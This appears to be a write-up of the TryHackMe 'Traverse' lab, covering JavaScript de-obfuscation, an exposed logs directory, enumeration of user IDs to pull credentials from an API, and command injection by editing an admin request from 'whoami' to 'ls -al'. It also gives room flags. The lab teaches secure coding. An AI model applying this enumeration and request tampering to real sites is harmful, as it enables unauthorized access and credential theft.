Room: https://tryhackme.com/room/traverse
Challenge your secure coding skills to restore a compromised website.
Difficulty: Easy
Author: 1337rce, https://tryhackme.com/p/1337rce
Version: traversev6
Bob is a security engineer at a firm and works closely with the software/DevOps team to develop a tourism web application. Once the website was moved from QA to Production, the team noticed that the website was getting hacked daily and wanted to know the exact reason. Bob consulted the blue team as well but has yet to be successful. Therefore, he finally enrolled in the Software Security pathway at THM to learn if he was doing something wrong.
Can you help Bob find the vulnerabilities and restore the website?
Questions:
What type of encoding is used by the hackers to obfuscate the JavaScript file?
What is the flag value after de-obfuscating the file?
Logging is an important aspect. What is the name of the file containing email dumps?
The logs folder contains email logs and has a message for the software team lead. What is the name of the directory that Bob has created?
What is the key file for opening the directory that Bob has created for Mark?
What is the ID for the user with admin privileges?
The attacker uploaded a web shell and renamed a file used for managing the server. Can you find the name of the web shell that the attacker has uploaded?
What is the name of the file renamed by the attacker for managing the web server?
Can you use the file manager to restore the original website by removing the “**FINALLY HACKED**” message? What is the flag value after restoring the main website?
So let’s start the machine and go to the ip, http://MACHINE_IP/
When i go to the site i get presented with a “FINALLY HACKED !!! I HATE MINIFIED JAVASCRIPT” Text.
Let’s check the source code, either right click page source or just CTRL+U
Found this snippet and of course i need to check on the “custom.min.js”
<script src='/tailwind.min.js'></script> <!-- THIS IS OFFICIAL FILE - DO NOT CHANGE IT -->
<script src='custom.min.js'></script> <!-- THIS IS CUSTOM JS FILE-->
So we got this and this looks a lot like a encoding we are familiar with.
Let’s work with Cyberchef: https://gchq.github.io/CyberChef/ i get a compressed JavaScript so after an un-minify of the JavaScript i get a JavaScript that is readable.
(function () {
function doNothing() {}
var n = "DIRECTORY";
var e = "LISTING";
var o = "IS THE";
var i = "ONLY WAY";
var f = null;
var l = false;
var d;
if (f === null) {
console.log("Flag:" + n + " " + e + " " + o + " " + i);
d = undefined;
} else if (typeof f === "undefined") {
d = undefined;
} else {
if (l) {
d = undefined;
} else {
(function () {
if (d) {
for (var n = 0; n < 10; n++) {
console.log("This code does nothing.");
}
doNothing();
} else {
doNothing();
}
})();
}
}
})();I made it easy for myself, after a quick review of the code for Evals() and other evil code, i just ran the code in the console in the browser.
Run the web-tools with F12, and at least in Firefox i need to type “allow pasting” before pasting a script
The output points us to a directory listening misconfiguration and of course remember the comments on the main page?
<!-- <li><a href="./logs" class="hover:text-gray-300">Logs</a></li> DevOps team to check and remove it later on -->So lets checkout http://MACHINE_IP/logs/
And in there there is a file which name is one of the answers to the questions.
Within in this file we have a “password” and a clue to another directory a wink to SSDLC. When typing in the correct directory you will be presented with a dialog asking for the password and when logged in you are presented with an API documentation:
And when you got that documentation it is just matter of enumeration of the API.
When calling for an example:
http://MACHINE_IP/api/?obfuscated_id=1 you will get a JSON object with name, email and password among other things.
So just increment the number until you get the answers to the questions.
One of the API entries we get an admin endpoint and credentials. Let’s go to that one and when logged in to the admin part, you are presented with basically system calls. We get 2 options
“System Owner”
“Current Directory”
But as always just because it is the only options presented it does not mean it is the only options you can send in. Let’s hijack the request!
You can do it with Burpsuite and the Proxy or you can do the more hacky way, using the Network tab in the web tools right there in the browser.
The original request consist of “command=whoami” so just edit and resend that request and add the new command:
So replace “whoami” with “ls -al” and the output will be:
Password for accessing original file manager: THM{10101}
<br>total 212
drwxrwxrwx 2 ubuntu ubuntu 4096 May 26 09:13 .
drwxrwxrwx 9 root root 4096 Jun 2 13:05 ..
-rwxrwxrwx 1 ubuntu ubuntu 2425 May 26 06:25 index.php
-rwxrwxrwx 1 ubuntu ubuntu 2879 May 26 07:08 main.php
-rwxrwxrwx 1 ubuntu ubuntu 193541 May 26 09:12 ObfuscatedFileForAnswer.php
-rwxrwxrwx 1 ubuntu ubuntu 70 May 26 09:31 obfuscatedShell.phpSo lets get to the filemanager that is the original one! Obfuscated above.
And within the index.php there is php snippet and the flag is there in clear-text, so for the challenge part we are done.
But if you want to do it completely: Just change the variable “$message” to something else like Not Hacked and save the file.
And then your website will look like this:
Room complete!
So this was a room that was connected to the Security Engineer path, so it was a lot of SSDLC and API insecurities. It was a fun room and it was at a good level, the last parts you need to have some basic Linux commands but overall a good starter.
